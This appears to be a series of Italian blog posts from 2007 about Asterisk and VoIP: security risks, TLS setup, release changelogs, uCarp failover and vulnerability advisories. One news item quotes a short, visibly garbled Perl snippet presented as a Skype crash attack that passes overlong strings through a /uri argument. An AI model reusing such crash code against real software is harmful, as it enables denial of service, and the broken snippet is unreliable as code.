Di recente sono stati pubblicati interessanti documenti relativi alla sicurezza del VoIP (un buon punto di partenza puo’ essere voipsa).

Riporto di seguito, quelli che sono stati definiti i 9 pericoli e vulnerabilita’ del VoIP. L’articlo o le slide mostrate indicano alcuni reali pericoli, a cui siamo esposti attraverso la tecnologia VoIP, sicuramente, non sono tutti, ma e’ un buon punto di partenza per indagare sulla secirezza della vostra rete telefonica.

• Remote eavesdropping
• VoIP hopping
• Vishing
• VoIP SPAM
• Toll fraud
• Skype worms
• Voip over Wifi
• Lack of robust implementation
• Weak default settings

Personalmente, per quanto Skype sia voice over ip, lo escluderei dalla lista, in quanto il suo problema e’ specifico all’implementazione e non relativo alla tecnologia VoIP; cosi come il wifi ed il problema delle configurazioni dei default, in quanto piu generici.

Rimanendo in tema sicurezza vi consiglio l’ascolto di un interessate podcast BlueBox #57 su problemi spcifici di Asterisk e non solo.

Delle altre slide mostrare ad Astricon 2007 le potete leggere su slideshare.

Tra le nuove funzionalita’ di Asterisk 1.6, compare il supporto TLS per l’accesso alle AMI e HTTP, scritto tra l’altro dall’Italiano Luigi Rizzo (intervistato anche da noi tempo fa).

Abilitarene il supporto e’ facilissimo, bastera’ scrivere queste due righe nella sezione General dei file manager.conf per AMI e http.conf per , beh, il server HTTP :P.


sslenable = yes
sslcert = /var/lib/asterisk/asterisk.pem


per chi come me fosse stato in vacanza occupandosi di tutto tranne che di voip, ecco una breve panoramica su quanto e’ accaduto nel mondo di asterisk nel frattempo.

30 Luglio - nella mailing list -users di Asterisk e’ copraso un Load balacer per IAX2, che non necessita di Asterisk. Al momento a detta dell’autore e’ in fase di sviluppo, ma da test fatti e’ gia possibile utilizzarlo.
http://www.gradwell.com/tmp/iax_proxy.tar.gz

1 Agosto - SiVuS , e’ stata rilasciata la nuova versione 1.10 per Linux, uno scanner di vulnerabilita SIP.

3 Agosto - [OT] Google Phone, ennesimo annuncio, chissa…

5 Agosto - AsterCRM, e’ nata un alternativa al famoso SugarCRM, pensata per Asterisk, le funzionalita‘ sono ovviamente minori, anche se al momento gia mostra Pop-up when dial in, PoP-up when dial out, Auto-complete, Click-to-dial, Transfer e Exension manager.

7 Agosto - Asterisk 1.2.24 and 1.4.10 released, nel comunicato si consiglia l’upgrade a chi utilizza chan_skinny, che soffriva dell’ennesimo bug. Per il resto sono stati effettuati numerosi fix, in particolare sul chan IAX2.

8 Agosto - chan_mobile, in asterisk_addons. Attraverso questo chan e’ possibile utilizzare cellulari bluetooth come FXO ed il microfono come FXO, bello no

14 Agosto - Iaxclient Branching off 2.0, e’ stato aperto il ramo 2.0 contenente il supporto video in modo ufficiale, prima era presente solo in svn.

15 Agosto - Lightweight Home Security with Indigo and Asterisk, ovvero domotica targata Asterisk,

16 Agosto - [OT ma doveroso] 14 Compleanno di Debian

17 Agosto - Skype, caduto! Le dichiarazioni uffciali negano la possibilita’ di un attacco, ma non molto tempo prima e’ stato pubblicato questo… che abbia influito?!

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!

for ($i=256; $i>xCCCCC; $i=$i+256){
$eot=’AAAA’ x $i;
call_sp();
}
exit;

sub call_sp(){
$str=â€?\â€?C:\\Program Files\\Skype\\Phone\\Skype.exe\â€? \â€?/uri:$eot\â€?”;
}

Finalmente ferie , se qualcuno si torvasse nei paraggi del ccc ci si vede li

Dopo aver installato uCarp ed esserci accertati del suo funzionamento, possiamo continuare la nostra configurazione per far si che il cambio di stato avvenga anche quando Asterisk non dovesse piu’ rispondere.

Sicuramente, la maggior parte di voi, avra’ intuito le potenzialita’ e come sia possibile “integrarlo” a nostro piacimento, una semplice soluzione puo’ essere la seguente:

» Read the rest of the entry..

Vi sono varie possibilita’ per strutturare un sistema HA per Asterisk. Quello che vi presentero’ oggi con un micro HowTo e’ sicuramnte una delle piu veloci ed a mio giudizio efficaci.

A dire il vero il grosso del lavoro lo fa uCarp, (Common Address Redundancy Protocol) software portato dal OpenBSD, alternativa al VRRP di Cisco.

» Read the rest of the entry..

Poco piu di 12ore fa sono state rilasciate due nuove versioni, la 1.2.23 e la 1.4.9, il sito di asterisk, in prima pagina non riporta nemmeno la news degli update, ma sono disponibili in download.

Dai Changelog, sembrano due update rivolti piu al fix di bug minori ed alla pulizia del codice sia per entrabe le versioni.

I cambiamenti piu importanti secondo me sono questi:

* [r76801] apps/app_queue.c: Added a membercount variable to call_queue
Aggiunta una variabile per capire quanti membri sono loggati in una particolare coda.

* [r76708] apps/app_voicemail.c: It was our stated intention for 1.4 that
Corretta la creazione dei file (umask) della voicemail.

* [r76227] channels/chan_sip.c: Merged revisions 76226 via svnmerge from
La memoria utilizzata per il localaddr non veniva liberata al reload della configurazione

* [r75928] channels/chan_iax2.c: Merged revisions 75927 via svnmerge from
Fix nell’invio dei VNAK

L’aggiornamento del ramo 1.2 presenta un sottoinsieme molto ristretto degli aggiornamenti fatti al 1.4, 10 contro 39. E’ interessante notare come i fix apportati chan_skinny per il ramo 1.4 non siano stati versati anche in quello 1.2.

In realta l’update e’ volto a correggere un altro bug di sicurezza di tipo Denial of Service, presente sul canale IAX2, se configurato per ricevere chiamate non autenticate.

L’attaccante puo’ inviare numerosi pacchetti NEW ad una estensione valida, asterisk alloca le risorse e senza piu liberarle. Maggiori dettagli nel pdf.

Download 1.2.23 e 1.4.9

Asterisk e Bluethooth, Nerd Vittles, ha pubblicato un articolo in cui spiega passo passo come utilizzarlo.

L’articolo e’ pensato per Bluetooth + Asterisk + iPhone, ma come noterete l’idea alla base e’ molto semplice e utilizzabile con qualsiasi dispositivo.

Il funzionamento e’ molto semplice, vi e’ uno script che verifica la presenza di apparti bluetooth, nel caso in cui trovasse quello “richiesto” inserisce un valore nel DB del nostro asterisk. Sara sufficente modificare il nostro Dialplan e far comportare il nostro asterisk in modo diverso in base alla presenza o meno di un dato valore nel DB.

Voip-cluster.org hanno rilasciato BioCluster, un motore peer-to-peer per il clustering del nostro Asterisk.

BioCluster era stato pensato inizialmente per soluzioni Asterisk, tuttavia il framework e’ stato milgiorato ed e’ ora possibile estenderlo per clusterizzare software che normalmente non ne hanno la possibilita’.

BioCluster e’ rilasciato in licenza GPL, anche se alcune componenti come l’interfaccia di amministrazione sono commerciali.

Se volete provarlo on line e’ presente una demo, infine il software e’ scritto in Java nel caso vi interessasse.

Nuove versioni sia per 1.2 (1.2.22) che per 1.4 (1.4.8), sono state rilasciate a causa di 4 problemi di sicurezza abbastanza gravi, che permettono l’esecuzione di codice arbitrario.

* CVE-2007-3762 Exploitable Stack Buffer Overflow

Tutte le versioni, un buffer overflow, accade quando si invia un grosso frame rtp, ad una porta rtp attiva in una comuncazione IAX2.

» Read the rest of the entry..